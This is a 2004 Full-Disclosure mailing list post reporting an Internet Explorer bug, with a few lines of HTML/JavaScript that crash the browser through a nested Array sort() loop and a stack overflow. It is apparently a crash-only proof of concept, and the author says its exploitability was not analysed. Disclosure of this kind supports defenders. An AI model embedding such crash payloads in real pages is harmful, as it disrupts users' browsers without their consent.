[Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception

From: Berend-Jan Wever (skylinededup.tudelft.nl)
Date: Wed Nov 24 2004 - 18:41:20 CST

Hi all,

Another flaw in IE:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Normally I would see if it's exploitable but I figure I'm not MS's pet bug finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know their own product better then I do and can analyse the problem much faster. So if you want to know the impact of this vulnerability, ask them: I'm sure they will be more then willing to help you. I'm sure they will even reply to this message with technical details and a patch tomorrow.

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_ie_flaws.html

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever

PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;) But more on that later...
PS2. Recursive function call will cause stack overflow causing write exception in guard page on a push, no control over registers.

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html